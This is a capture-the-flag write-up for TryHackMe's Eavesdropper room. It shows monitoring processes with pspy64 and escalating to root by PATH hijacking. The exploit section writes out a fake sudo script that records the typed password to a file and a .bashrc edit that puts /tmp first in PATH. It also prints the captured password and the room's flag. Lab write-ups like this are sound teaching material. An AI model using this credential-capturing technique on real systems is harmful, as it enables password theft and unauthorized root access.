DEATHESTHER
← All write-ups

TRYHACKME WRITE-UP

Eavesdropper - TryHackMe writeup

Listen closely, you might hear a password!

EasyLinuxPrivilege escalation7 min read

Open the room on TryHackMe ↗ View on GitHub

Task 1. Download Keys

The room already provides an SSH private key for the user frank, so I started by downloading the attached key file and preparing it for SSH authentication.

Before using the key, I changed its permissions so SSH would accept it.

chmod 600 id-rsa-1647296932800.id-rsa

Once the permissions were fixed, I logged into the target machine as frank.

ssh frank@<IP> -i id-rsa-1647296932800.id-rsa

Initial Enumeration

Since the room is called Eavesdropper, I immediately started looking for anything related to background activity or processes running on the machine.

To monitor processes from other users, including root, I decided to use pspy64. First, I downloaded the binary on my attacker machine and transferred it to the target using SCP.

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
scp -i id-rsa-1647296932800.id-rsa pspy64 frank@<IP>:.

After transferring the binary, I gave it execution permissions and started monitoring the running processes.

chmod +x pspy64
./pspy64

After letting it run for a few moments, several processes started appearing continuously. One process immediately stood out:

CMD: UID=0     PID=662    | sudo cat /etc/shadow
image

This was interesting because the command was being executed as root, but it was using sudo without a full path.

That behavior suggested the command might be vulnerable to PATH hijacking. It also looked like the process was being triggered automatically whenever a user logged in through SSH.

At this point, the goal became clear. If I could place a fake sudo binary earlier in the PATH, the system would execute my malicious version instead of the legitimate one.

Privilege Escalation

To exploit this behavior, I created a fake sudo script inside /tmp.

cat > /tmp/sudo << 'EOF'
#!/bin/bash
read -p "Test" password
echo $password > /home/frank/pass.txt
EOF

The script simply waits for user input and stores whatever is entered into a file called pass.txt.

After creating the script, I made it executable.

chmod +x /tmp/sudo

Next, I modified frank’s PATH variable so the system would search /tmp before the legitimate system directories.

sed -i '4iPATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin' ~/.bashrc

To verify the change, I checked the first few lines of .bashrc.

head -n 6 ~/.bashrc

Then I reloaded the configuration.

source ~/.bashrc

Triggering the Exploit

With everything prepared, I logged out and connected back through SSH.

exit
ssh -i id-rsa-1647296932800.id-rsa frank@<IP>

During login, the automated process executed sudo cat /etc/shadow.

Because /tmp appeared first in the PATH variable, the system executed my fake sudo script instead of the real binary. The password entered by root was captured and written into /home/frank/pass.txt.

1

I checked the file and recovered the password:

!@#frankisawesome2022%*

Root Access

Using the captured password, I switched to root.

/usr/bin/sudo su
[sudo] password for frank: !@#frankisawesome2022%*
image

Once authenticated, I successfully gained root access and retrieved the flag from the root home directory.

Flag

flag{14370304172628f784d8e8962d54a600}
image

Conclusion

Eavesdropper was a short but interesting room focused on process monitoring and PATH hijacking. The biggest clue came from observing background activity with pspy64, which eventually revealed a vulnerable execution flow that could be abused to capture credentials and gain root access.

Thanks for reading this walkthrough. I hope it helped you understand the room and follow the privilege escalation process clearly.

You can check out more of my walkthroughs here: